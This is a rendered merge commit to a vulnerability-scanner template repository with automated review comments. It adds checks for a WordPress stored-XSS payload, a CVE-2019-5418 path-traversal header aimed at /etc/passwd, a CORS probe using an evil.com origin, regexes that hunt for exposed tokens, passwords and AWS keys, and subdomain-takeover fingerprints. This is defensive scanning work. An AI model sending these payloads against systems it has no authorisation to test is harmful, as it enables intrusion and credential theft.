Merge pull request #86 from Nadino92/master

improvements across multiple templates and new additions
patch-1
bauthard 2020-05-24 09:16:54 +05:30 committed by GitHub
commit 0a564274ac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
14 changed files with 145 additions and 39 deletions

17
cves/CVE-2018-18069.yaml Normal file

@ -0,0 +1,17 @@
id: CVE-2018-18069
info:
name: Wordpress unauthenticated stored xss
author: nadino
severity: medium
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php"
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
matchers:
- type: dsl
dsl:
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'
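Review bot: The dsl matcher on the last line only confirms that the WPML admin action answered with a 302 and set `_icl_current_admin_language`, which shows the plugin handled the request, not that the payload in `body` was stored, so the template will report every reachable WPML install; a follow-up request that looks for the injected marker, or at least a `description:` under `info:` stating that the match is an indicator only, would make the result honest. The `body` value is single-quoted, so the `\"` sequences are sent as a literal backslash plus quote — presumably intended to mirror the original proof of concept, but worth a short comment confirming it. Since the action name suggests the request writes to the target's theme localization settings, the `description:` should also carry the advisory URL so operators can judge the check before running it. Indentation was lost in rendering, so nesting under `info:` and `requests:` cannot be verified here.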

16
cves/CVE-2018-6389.yaml Normal file

@ -0,0 +1,16 @@
id: CVE-2018-6389
info:
name: Wordpress Load Script
author: nadino
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/load-scripts.php?load="
matchers:
- type: dsl
dsl:
- 'contains(x_powered_by,"Engine")'
- 'contains(content_type,"javascript")'
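Review bot: The two dsl expressions at the end are separate matchers with no `matchers-condition: and`, so under the default or-condition a `javascript` content type alone satisfies the template, and neither expression relates to the load-scripts.php resource-exhaustion issue that CVE-2018-6389 tracks — the request sends an empty `load=` and only establishes that the endpoint responds. `contains(x_powered_by,"Engine")` further ties the match to one hosting provider's banner rather than to WordPress itself, which seems unintended. If this is meant as an existence check, `severity: high` overstates it; adding `matchers-condition: and` and a `description:` under `info:` saying the template only detects the endpoint would make the output interpretable.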


@ -5,13 +5,13 @@ info:
author: omarkurt
severity: medium
#reference: https://github.com/omarkurt/CVE-2019-5418
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Accept: ../../../../../../../../etc/passwd{{
Accept: ../../../../../../../../etc/passwd
matchers:
- type: status
status:
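Review bot: The rendering does not preserve which of the two `Accept:` lines is the new one, and the only difference is the trailing `{{`; because `{{` is also the engine's variable-expansion syntax, an unbalanced `{{` in a header value may interact with substitution, so whichever form is kept should carry a comment explaining the choice, e.g. `# trailing {{ kept deliberately; verified against the engine's template expansion`. The `#reference:` line under `info:` is a comment and invisible to tooling; if the engine accepts a `description:` field, the advisory URL belongs there instead. The status matcher at the end of the hunk continues outside it, so its values cannot be checked here.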

1
hosts.txt Normal file

@ -0,0 +1 @@
http://192.168.1.16
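Review bot: `hosts.txt` holding the single private address `http://192.168.1.16` looks like a local target list committed by accident; a template repository should not ship a target file, and a private address in it is meaningless to other users. Drop the file from the PR and, if a targets file is useful for local runs, add `hosts.txt` to the repository's ignore list so it cannot recur.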

32
noisy/general-tokens.yaml Normal file

@ -0,0 +1,32 @@
id: general-tokens
#this will create a huge load of false positive
info:
name: General Tokens
author: nadino
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'regex("TOKEN[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any TOKEN word
- 'regex("API[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any API word
- 'regex("KEY[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any KEY word
- 'regex("SECRET[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any SECRET word
- 'regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any AUTHORIZATION word
- 'regex("PASSWORD[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any PASSWORD word
extractors:
- type: regex
part: body
regex:
- "(T|t)(O|o)(K|k)(E|e)(N|n)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)+( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
- "(A|a)(P|p)(Ii)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
- "(K|k)(E|e)(Y|y)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
- "(S|s)(E|e)(C|c)(R|r)(E|e)(T|t)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
- "(A|a)(U|u)(T|t)(H|h)(O|o)(R|r)(I|i)(Z|z)(A|a)(T|t)(I|i)(O|o)(N|n)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
- "(P|p)(A|a)(S|s)(S|s)(W|w)(O|o)(R|r)(D|d)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"

19
noisy/general-xss.yaml Normal file

@ -0,0 +1,19 @@
id: General XSS
info:
name: General XSS
author: nadino
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- 'a''"><injectable>'
part: body
- type: dsl
dsl:
- 'contains(content_type,"html")'
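Review bot: The word matcher looks for `a'"><injectable>` in the body, but the request is a bare GET to `{{BaseURL}}` that never sends that string, so nothing can reflect it; the marker has to be carried in the request (for example as a query parameter on the `path` entry) for the matcher to mean anything. Because there is no `matchers-condition: and`, the second matcher `contains(content_type,"html")` fires on its own under the default or-condition, so the template currently reports every HTML page as XSS. Add `matchers-condition: and` at the request level and give the request a parameter that carries the marker. `id: General XSS` also breaks the kebab-case convention of the sibling templates (`general-tokens`, `crxde`); `id: general-xss` matches the file name.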

15
panels/crxde.yaml Normal file

@ -0,0 +1,15 @@
id: crxde
info:
name: CRXDE Lite
author: nadino
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/crx/de/index.jsp"
matchers:
- type: word
words:
- "<title>CRXDE Lite</title>"


@ -8,7 +8,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
headers:
Origin: https://evil.com
matchers:
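Review bot: The page does not preserve which `path` form is new, `"{{BaseURL}}/"` or `"{{BaseURL}}"`, and the same pair recurs in the hunks ending at L304, L313, L331, L343 and L355; whichever is kept, the correct choice depends on whether `BaseURL` arrives with or without a trailing slash, so a one-line comment above the first changed `path:` recording the convention chosen would stop the next contributor flipping it back. It is also worth checking that templates not touched by this PR follow the same form. The enclosing request block starts before this hunk.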


@ -8,7 +8,7 @@ info:
# Update this list with new takeovers matchers
# Do not delete other template files for takeover
# https://github.com/EdOverflow/can-i-take-over-xyz
# You need to claim the cname the subdomain to confirm the takeover.
# You need to claim the cname the subdomain to confirm the takeover.
# Do not report this without claiming the cname.
requests:
@ -22,17 +22,17 @@ requests:
name: pantheon.io
words:
- "The gods are wise, but do not know of the site which you seek."
- type: word
name: aws-s3-bucket
words:
- "The specified bucket does not exist"
- type: word
name: anima
words:
- "If this is your website and you've just created it, try refreshing in a minute"
- type: word
name: ghost
words:
@ -68,6 +68,12 @@ requests:
- ngrok.io not found
- Tunnel *.ngrok.io not found
- type: word
name: tumblr
words:
- Whatever you were looking for doesn't currently exist at this address.
- There's nothing here.
- type: word
name: github
words:
@ -277,57 +283,57 @@ requests:
name: readme
words:
- Project doesnt exist... yet!
- type: word
name: smugmug
words:
- '{"text":"Page Not Found"'
- type: word
name: airee
words:
- Ошибка 402. Сервис Айри.рф не оплачен
- type: word
name: kinsta
words:
- No Site For Domain
- type: word
name: launchrock
words:
- It looks like you may have taken a wrong turn somewhere. Don't worry...it happens
to all of us.
- type: word
name: Strikingly
words:
- But if you're looking to build your own website
- you've come to the right place.
- type: word
name: HatenaBlog
words:
- 404 Blog is not found
- Sorry, we can't find the page you're looking for.
- type: word
name: wufoo
words:
- Profile not found
- Hmmm....something is not right.
- type: word
name: hubspot
words:
- Domain not found
- does not exist in our system
- type: word
name: jazzhr
words:
- This account no longer active
- type: word
name: smartjob
words:
@ -339,19 +345,19 @@ requests:
name: Uptimerobot
regex:
- "^page not found$"
- type: word
name: agile
name: agile
words:
- Sorry, this page is no longer available.
- type: word
name: pingdom
name: pingdom
words:
- Public Report Not Activated
- This public report page has not been activated by the user
- type: word
name: zendesk
name: zendesk
words:
- this help center no longer exists
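Review bot: The tumblr matcher added in the `@ -68,6 +68,12 @@` hunk lists `There's nothing here.` as its second word, and under the word matcher's default or-condition that generic phrase will match many unrelated 404 pages, not just Tumblr; either drop it or add `condition: and` so both phrases must appear. The aws-s3-bucket/anima pair in the second hunk is rendered without markers, so it is unclear which matcher was removed — if aws-s3-bucket was dropped, a line in the header comment block explaining why would help, since that block already documents the claim-before-report rule. The remaining hunks appear to be whitespace-only changes (identical lines printed twice) and need nothing.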


@ -1,22 +1,22 @@
id: amazon-mws-auth-token-value
info:
info:
author: puzzlepeaches
name: "Amazon MWS Auth Token"
severity: medium
requests:
-
extractors:
-
requests:
-
extractors:
-
part: body
regex:
regex:
- "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
type: regex
matchers:
-
matchers:
-
part: body
regex:
regex:
- "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
type: regex
method: GET
path:
- "{{BaseURL}}/"
path:
- "{{BaseURL}}"


@ -8,7 +8,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers:
- type: regex
part: body
@ -18,4 +18,4 @@ requests:
- type: regex
part: body
regex:
- "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
- "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"


@ -8,7 +8,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers:
- type: regex
part: body


@ -8,7 +8,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers:
- type: regex
part: body


@ -11,7 +11,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers:
- type: regex
part: body